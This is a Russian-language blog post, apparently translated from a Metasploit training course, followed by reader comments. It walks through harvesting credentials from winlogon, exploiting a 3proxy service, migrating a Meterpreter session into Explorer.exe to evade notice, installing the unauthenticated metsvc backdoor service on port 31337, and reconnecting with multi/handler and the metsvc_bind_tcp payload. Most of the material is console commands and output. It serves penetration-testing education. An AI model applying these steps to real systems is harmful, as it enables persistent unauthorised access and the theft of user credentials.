Выше можно наблюдать, переключившись на процесс Winlogon мы можем собрать «неплохой урожай» учетных данных всех пользователей, входящих в систему. В данном примере мы получили учетные данные пользователя Administrator с паролем 'ohnoes1vebeenh4x0red!'.
Функциональность Backdoor в Meterpreter.
Пройдя через весь путь «эксплуатации» системы, который зачастую бывает весьма не легок, хорошей мыслью будет оставить для себя «черный ход» в эту систему. Таким образом, если эксплуатируемый сервис пропатчен или обновлен, вы все равно получаете доступ к системе.
К стволу разработки Metasploit был добавлен 'metsvc' Александра Сотирова. Чтобы прочитать о первоначальной реализации metsvc, перейдите на .
Используя этот backdoor, вы можете получить shell Meterpreter в любой точке.
Однако, прежде чем мы пойдем дальше, одно предупреждение. Metsvc, как показано в наших примерах, не требует аутентификации. Это означает, что тот кто получает доступ к порту, получает и доступ к backdoor. Это «ни есть хорошо», когда вы проводите тест на проникновение, потому как может связано с определенным риском. В реальной же ситуации, вы или должны изменить исходники для поддержки аутентификации или фильтровать удаленные подключения другими методами.
Для начала, «проэксплуатируем» удаленную систему, затем мигрируем на процесс Explorer.exe, в случае если пользователь заметит, что эксплуатируемая нами служба «не отвечает» и захочет «убить процесс».
msf exploit(3proxy) > exploit [*] Started reverse handler [*] Trying target Windows XP SP2 - English... [*] Sending stage (719360 bytes) [*] Meterpreter session 1 opened (192.168.1.101:4444 -> 192.168.1.104:1983) meterpreter > ps Process list ============ PID Name Path --- ---- ---- 132 ctfmon.exe C:\WINDOWS\system32\ctfmon.exe 176 svchost.exe C:\WINDOWS\system32\svchost.exe 440 VMwareService.exe C:\Program Files\VMware\VMware Tools\VMwareService.exe 632 Explorer.EXE C:\WINDOWS\Explorer.EXE 796 smss.exe \SystemRoot\System32\smss.exe 836 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe 844 VMwareUser.exe C:\Program Files\VMware\VMware Tools\VMwareUser.exe 884 csrss.exe \??\C:\WINDOWS\system32\csrss.exe 908 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe 952 services.exe C:\WINDOWS\system32\services.exe 964 lsass.exe 1120 vmacthlp.exe C:\Program Files\VMware\VMware Tools\vmacthlp.exe 1136 svchost.exe C:\WINDOWS\system32\svchost.exe 1236 svchost.exe C:\WINDOWS\system32\svchost.exe 1560 alg.exe C:\WINDOWS\System32\alg.exe 1568 WZCSLDR2.exe C:\Program Files\ANI\ANIWZCS2 Service\WZCSLDR2.exe 1596 jusched.exe C:\Program Files\Java\jre6\bin\jusched.exe 1656 msmsgs.exe C:\Program Files\Messenger\msmsgs.exe 1748 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe 1928 jqs.exe C:\Program Files\Java\jre6\bin\jqs.exe 2028 snmp.exe C:\WINDOWS\System32\snmp.exe 2840 3proxy.exe C:\3proxy\bin\3proxy.exe 3000 mmc.exe C:\WINDOWS\system32\mmc.exe meterpreter > migrate 632 [*] Migrating to 632... [*] Migration completed successfully.
Перед установкой metsvc, давайте посмотрим возможные опции командной строки.
meterpreter > run metsvc -h [*] OPTIONS: -A Automatically start a matching multi/handler to connect to the service -h This help menu -r Uninstall an existing Meterpreter service (files must be deleted manually) meterpreter >
Поскольку мы уже подключены через Meterpreter сессию, мы не сможем осуществить подключение к metsvc сразу, поэтому сейчас просто установим службу.
meterpreter > run metsvc [*] Creating a meterpreter service on port 31337 [*] Creating a temporary installation directory C:\DOCUME~1\victim\LOCALS~1\Temp\JplTpVnksh... [*] >> Uploading metsrv.dll... [*] >> Uploading metsvc-server.exe... [*] >> Uploading metsvc.exe... [*] Starting the service... [*] * Installing service metsvc * Starting service Service metsvc successfully installed. Meterpreter >
Служба установлена и ждет соединение, давайте не будем заставлять ее ждать долго.
Взаимодействие с Metsvc.
Для подключения к удаленной системе мы воспользуемся multi/handler с полезной нагрузкой 'windows/metsvc_bind_tcp'. Это специальная нагрузка. Как правило нагрузка в Meterpreter является многоступенчатой где минимальная часть кода передается как часть эксплоита, а затем уже подгружается оставшийся исполняемый код.
Представьте себе челночную ракету или ракету носитель, которые доставляют космический челнок на орбиту. У нас схожая ситуация. Однако в данном случае, полный код Meterpreter уже загружен на удаленный компьютер, и нет необходимости поэтапного подключения.
Установим все необходимые опции для полезной нагрузки "metsvc_bind_tcp": IP адрес удаленной эксплуатируемой системы и порт подключения на нашей локальной системе. Запускаем эксплоит.
msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp PAYLOAD => windows/metsvc_bind_tcp msf exploit(handler) > set LPORT 31337 LPORT => 31337 msf exploit(handler) > set RHOST 192.168.1.104 RHOST => 192.168.1.104 msf exploit(handler) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/metsvc_bind_tcp): Name Current Setting Required Description ---- --------------- -------- -----------
Вот статья с сайта по тематике похожего на ваш, но подача материала не ахти.
Там указан и источник статьи. Возможно ли с точки зрения последнего Bucktruck4 переработать статью и выложить.
спасибо.
Посмотрим, хотя тема не совсем интересна, «изъезжена вдоль и поперек» :) Хотя если подготовить статью по работе с SAM файлом и хэшами средствами BackTrack, можно попробовать. Вобщем не буду загадывать.
Именно только средствами BackTrack последнего релиза.
Ударная пара Метасплоит и BackTrack и сайту цены не будет.
Замечательная статья!!! Респект Вам!!! Очень помогла постигнуть истину! Желаю Вам больше релизов и однополчан! Спасибо!
Позвольте скажу свое мнение о BackTrack…. Не согласен что он самый совершенный! Gentoo с таким оружием на борту в разыыы сильнее и стабильнее! Хотя не осуждайте Линь для каждого свой!
Спасибо вам за отзыв, но я всего лишь перевел оригинал, как смог :). Жаль, что немного не хватило времени перевести весь курс до конца, но думаю вскоре как нибудь выделю, там немного осталось.
Спасибо! Буду ждать Ваших статей! Очень грамотно переведены!